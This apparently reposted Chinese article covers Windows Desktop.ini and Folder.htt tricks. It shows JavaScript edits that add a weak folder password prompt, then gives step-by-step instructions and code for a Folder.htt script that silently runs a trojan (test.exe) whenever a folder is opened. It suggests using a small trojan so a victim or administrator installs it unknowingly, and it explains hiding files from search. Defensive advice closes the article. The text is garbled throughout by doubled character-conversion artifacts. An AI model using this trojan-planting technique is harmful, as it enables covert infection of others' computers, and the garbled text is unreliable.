您還記得當(dāng)初大名鼎鼎的"歡樂時(shí)光"病毒嗎？感染該病毒的硬盤中會(huì)有多個(gè)Desktop.ini和Folder.htt文件，就算你刪除了目錄中的這兩個(gè)文件，當(dāng)你再次打開該目錄時(shí)，它們又像幽靈一樣出現(xiàn)了。

　　再問大家一個(gè)與此相關(guān)的問題：在Windows系統(tǒng)中，重復(fù)文件最多的什么呢？答案是Desktop.ini文件！在Windows目錄及其下的Favorites、System、Fonts、Tasks文件夾中都有該文件的身影！正是由于該文件的存在，使得它們?cè)谕庥^或其他方面也與普通的文件夾有所區(qū)別。下面筆者就談?wù)勥@兩個(gè)文件的一些奇妙用途。

一、給文件夾加上密碼

　　在學(xué)校的機(jī)房和校園網(wǎng)絡(luò)的管理中，是否經(jīng)常會(huì)碰到這樣的情況：一些計(jì)算機(jī)常因?qū)W生誤刪了Windows目錄或SYSTEM目錄下的一些系統(tǒng)文件而導(dǎo)致無法正常啟動(dòng)。是否有方法可以把Windows及其它重要目錄保護(hù)起來呢？方法是有的，我們只需在這個(gè)Folder.htt文件中進(jìn)行必要的修改，就可改變文件夾打開的方式。比如，要想在打開該文件夾前先進(jìn)行安全認(rèn)證，可這樣修改這個(gè)Folder.htt。

　　在C盤的Windows文件夾中找到Folder.htt文件（該文件為隱藏文件，并且后來經(jīng)過編輯與筆者共同驗(yàn)證，該文件不同的系統(tǒng)內(nèi)容也不盡相同，本文種主要是Windows 98下的），打開Folder.htt文件。找到以下內(nèi)容：

＜a href=''class=command onclick='ShowFiles()； ShowWinStat(winStat)； return false；' onMouseOver='ShowWinStat(!winStat)； return true；' onMouseOut='ShowWinStat(winStat)； return true；' onFocus='ShowWinStat(!winStat)； return true；' onBlur='ShowWinStat(winStat)； return true；'＞顯示文件＜/a＞。"； 將其修改為： ＜a href=''class=command onclick='ShowFiles()； ShowWinStat(winStat)； return false；' onMouseOver='ShowWinStat(!winStat)； return true；' onMouseOut='ShowWinStat(winStat)； return true；' onFocus='ShowWinStat(!winStat)； return true；' onBlur='ShowWinStat(winStat)； return true；'＞輸入密碼＜/a＞。"； （2）找到function ShowFiles() { 　　　　　　　　　　Info.innerHTML = L_Intro_Text + "＜br＞＜br＞" + L_Prompt_Text； 　　　　　　　　　　showFiles = true； 　　　　　　　　　　document.all.FileList.style.display = ""； 　　　　　　　　　　document.all.Brand.style.display = "none"； 　　　　　　　　　　FixSize()； 　　　　　　　　　　　} 　　修改為： ★function ShowFiles() {var password=prompt("請(qǐng)輸入密碼:","")； if (password=="你的密碼"){Info.innerHTML = L_Intro_Text + "＜br＞＜br＞" + L_Prompt_Text； showFiles = true； document.all.FileList.style.display = ""； document.all.Brand.style.display = "none"； FixSize()；} else{alert("警告，密碼錯(cuò)誤！您無權(quán)瀏覽該目錄")；}}

　　（3）保存修改后的Folder.htt文件，退出Windows文件夾。

　　完成上述操作步驟后，再進(jìn)入Windows目錄時(shí)，系統(tǒng)提示輸入密碼，只有輸入正確的密碼才能進(jìn)行該目錄。通過修改打開行為的代碼，就可實(shí)現(xiàn)對(duì)某個(gè)目錄的簡單 加密 。

　　當(dāng)然，這種加密目錄很容易解開：不使用Web方式打開文件夾，避開執(zhí)行該程序，或直接從DOS中進(jìn)入該文件夾都可繞開密碼的輸入。

　　如果你使用的是Windows 2000系統(tǒng)，可以找到

.................. ＜script language=" Java Script"＞

　　然后在后面加上以下代碼：

var pass =prompt("enter the password") if (pass!="密碼") {window.location="d:"}

　　就可以給文件夾加上訪問口令！這樣你的文件夾就多了一層保護(hù)。

二、任意文件夾和硬盤分區(qū)的保護(hù)

　　根據(jù)同樣的原理，我們可對(duì)任意文件夾及硬盤分區(qū)設(shè)置保護(hù)口今。具體操作步驟如下：

　　（1）打開要加密的文件夾或硬盤分區(qū)，選擇文件菜單中的"查看→自定義文件夾"。

　　（2）在打開的"自定義文件夾"窗口中，如圖1所示選擇"創(chuàng)建或編輯HTML文檔"，單擊"下一步"按鈕，再單擊"下一步"按鈕，關(guān)閉記事本編輯窗口，單擊"完成"按鈕。在當(dāng)C盤Windows目錄下找到Folder.htt文件，把它復(fù)制到當(dāng)前文件夾中，覆蓋原來的Folder.htt文件。

　　（3）打開Folder.htt文件，找到★var L_Intro_Text= "＜b＞＜font color=red＞警告＜/font＞＜/b＞＜br＞＜br＞修改該文件夾的內(nèi)容可能導(dǎo)致程序運(yùn)行不正常。"；★（警告內(nèi)容），將其修改為"自定義的內(nèi)容"。完成Folder.htt的文件修改后，再進(jìn)入相應(yīng)的文件夾或硬盤分區(qū)，則需要提供正確口令，否則無法顯示該文件夾的內(nèi)容。

圖1

　　（一）、利用文件夾安裝木馬

黑客可以利用文件夾來安裝木馬，其目的是對(duì)方只要打開某個(gè)文件夾就自動(dòng)安裝木馬文件。知己知彼方能百戰(zhàn)不殆，讓我們了解一下其原理和方法。

圖2

1.先在以目錄下建立一個(gè)文件夾test文件夾，進(jìn)入剛建的文件夾test點(diǎn)擊"工具"菜單選擇"文件夾選項(xiàng)"項(xiàng)（圖2）；出來文件夾選項(xiàng)對(duì)話框如圖所示（圖3），把"隱藏受保護(hù)的操作系統(tǒng)文件（推薦）"前面打上"√"，接著出現(xiàn)一個(gè)警告窗口，如圖所示（圖4），直接點(diǎn)擊"是"。再把"隱藏文件和文件夾"下選擇"顯示所有文件和文件夾"，最后點(diǎn)擊確定在本目錄下出現(xiàn)了Folder settings隱藏文件夾和Desttop.ini隱藏文件如圖所示（圖5）。

圖3



圖4



圖5

　　2.現(xiàn)在點(diǎn)擊"查看"菜單選擇"自定義文件夾"項(xiàng)（圖6），打開的"自定義文件夾"窗口，選擇其中的"創(chuàng)建或編輯HTML文檔"，單擊"下一步"按鈕，再單擊"下一步"按鈕，然后關(guān)閉記事本編輯窗口，單擊"完成"按鈕，就把文件夾設(shè)置成按WEB方式打開文件夾。再打開要放木馬的文件夾,我們就在這個(gè)文件夾里測試。Folder.Htt是文件夾的模板文件，現(xiàn)在我們修改文件夾的模板文件，在里面插入一端自動(dòng)運(yùn)行程序的代碼：

＜script language="javascript"＞ run_exe="＜OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject"" run_exe+="CODEBASE="test.exe#version=1,1,1,1"＞" run_exe+="＜PARAM NAME="_Version" value="65536"＞" run_exe+="＜/OBJECT＞" document.open()； document.clear()； document.writeln(run_exe)； document.close()； ＜/script＞

圖6

　　就是這段里面的test.exe為你要安裝的木馬文件，這里為了給大家看到效果我運(yùn)行的是LC4。

　　3.現(xiàn)在我們把要運(yùn)行的test.exe文件也copy到這個(gè)文件夾里，好了，我們現(xiàn)在把文件查看屬性修改回去，就是步驟1的逆過程。

　　4.OK，如果你不想要木馬立即運(yùn)行，請(qǐng)把窗口直接關(guān)閉，等管理員來運(yùn)行吧。讓我們來看看效果，退出test文件夾然后雙擊test文件夾圖標(biāo)，如圖所示（圖7），怎么樣，運(yùn)行了吧，大家可以把test.exe換成小點(diǎn)的木馬，這樣對(duì)方就在不知道的情況下給自己裝了木馬。其實(shí)大家如果要有什么文件要隱藏的話，就可以放到folder.htt和同目錄下，把文件夾屬性設(shè)置回去以后，用搜索都找不到這個(gè)文件。

圖7

三、總結(jié)

　　好了，F(xiàn)older.htt和Desktop.ini文件的好的應(yīng)用和需要注意的都講了，是不是覺得很有意思也很恐怖哦！現(xiàn)在我們說一下防范與解決辦法：

　　1.查看文件夾時(shí)，去掉以"Web頁方式"的選項(xiàng)。雖然我們看不見什么個(gè)性化目錄了，但我們換來是安全，我認(rèn)為值！但是，也請(qǐng)大家注意，如果不采用"WEB方式"查看文件夾前面介紹過的技巧和應(yīng)用就不能正常顯示了，有得就有失啊。

　　2.如果沒有什么需要，去掉默認(rèn)共享和共享目錄。要是需要，公共用戶也要加上密碼，密碼只有內(nèi)部人知道。只要能上傳文件，你的機(jī)器就很危險(xiǎn)。除了上邊的方法，還可以用MIME漏洞，ASP漏洞入侵，如果是Windows 98還有共享方法。所以一定要把好關(guān)！

　　3.腳本病毒的一大特征就是利用WSH。要是服務(wù)器最好去掉WSH，這樣能低御許多腳本病毒。方法是：在"控制面板"里選擇"添加/刪除程序"，選擇"Windows安裝程序"里的附件，再選擇"詳細(xì)資料"中的"Windows Scripting Host"把它卸載掉。

from

極速狂飆

google_ad_client = "pub-2416224910262877"; google_ad_width = 728; google_ad_height = 90; google_ad_format = "728x90_as"; google_ad_channel = ""; google_color_border = "E1771E"; google_color_bg = "FFFFFF"; google_color_link = "0000FF"; google_color_text = "000000"; google_color_url = "008000";

Desktop.ini文件的一些奇妙用途